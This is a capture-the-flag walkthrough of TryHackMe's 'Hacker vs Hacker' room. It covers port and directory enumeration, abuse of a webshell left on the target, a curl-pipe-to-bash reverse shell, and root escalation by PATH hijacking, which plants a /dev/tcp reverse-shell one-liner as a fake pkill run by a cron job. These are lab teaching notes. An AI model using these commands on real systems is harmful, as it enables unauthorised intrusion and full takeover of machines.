TryHackMe CTF Hacker vs Hacker

Hello guys back again with another walkthrough this time we are going to get our hands dirty on CTF (Hacker vs. Hacker) from TryHackMe.

Enumeration through NMAP:

nmap -sV -sC -Pn -A 10.10.168.53 -o nmap        

We have 2 ports open

1. SSH (secure shell) which normally requires authentication
2. HTTP (Hyper Text Transfer protocol) Normally a website

Now let's check website

Now got to the page source of this website and check the source code if we find anything malicious

Here we have find the /cvs directory, check this directory

Now go back to the home page of this website

Scrolling down we get a CV upload functionality.

We always know that if a website has file upload capability many time they are set up correctly but by chance sometimes you might be lucky and discover a misconfigured website.

Next I decided to begin testing file upload functionality to see if i could find any security misconfiguration that it might have. I decided to begin by just uploading a plain text file.

I create a simple text file now I'm uploading it to the website

After uploading file on to the website i got

Now check the page source what we get in the back-end

Looking at the screenshot above we notice that there is some source code disclosure. The application is using strpos() on file extension to determine whether an uploaded file is a pdf or not.

Enumeration Through Gobuster:

Now I start directory searching?using go buster

Gobuster is a tool used to brute-force URIs including directories and files as well as DNS subdomains

gobuster dir -u https://10.10.168.53/cvs/ -w /home/zkwan/Git/SecLists/Discovery/Web-Content/common.txt?-x .pdf.php -t 50        

From gibuster result here we got /shell.pdf.php

Now check it on website

here we got access to the /shell.pdf.php

Basic PHP Enumeration

Now I check basic PHP enumeration using cmd the following

/shell.pdf.php?cmd=id

So it is vulnerable to command injection. Now lets get a reverse shell.

Initial Foothold:

Create Reverse Shell

Here the above IP is from my VPN. Copy this?PHP one liner and create ka file with this code.

Now start the python webserver to upload this reverse shell to the website

Now start nc listener on another tab

Goto website and type the folowing cmd in the URL

cmd=curl https://10.8.78.190:8080/revshell.sh | bash

Check you nc listener there you will get Reverse shell

As you can see in the above picture i'm able to get the user flag

Privilege Escalation:

I went looking through the lachlan directory and noticed the .bash_history

Upon enumerating that, I found a few commands had been run:

The password for user lachlan was changed with echo -e command.

Looking at /etc/cron.d/persistence, we can maybe get backup.sh to run as root every minute.

Looking at the cronjob file we notice a vulnerability that leads to remote code execution. The PATH variable is used to determine where exactly the binaries are going to be called from

The program will first go to /home/lachlan/bin to search for the binaries followed by /bin and lastly /usr/bin

Since we have read and write privileges on /home/lachlan/bin we can just drop our binary and wherever root runs the cronjob he’ll execute our binary instead of the real binary. But Looking the the cronjob again we notice that some binaries are using absolute paths meaning they cannot be hijacked but pkill is using a relative path

we can just login to the system and upload a malicious binary to /home/lachlan/bin which when executed will give us a root shell.

Now login with ssh

But the SSH session keeps getting terminated after a few seconds this is due to a cronjob that’s running as root

Now exit this session and start netcat listener on port 4545:

Now login again via ssh

After login?executed the below command before being kicked out by the cronjobn

echo "bash -c 'bash -i >& /dev/tcp/10.8.78.190/4545 0>&1'" > bin/pkill ; chmod +x bin/pkill        

Check you netcat listener there you will get reverse shell as root

That's all guys the CTF is done. We have successfully capture two flags one is from user access and other is from root access.

I hope you enjoyed the walkthrough if so like for me down below and follow me as well so that you won’t miss any upcoming future walkthroughs.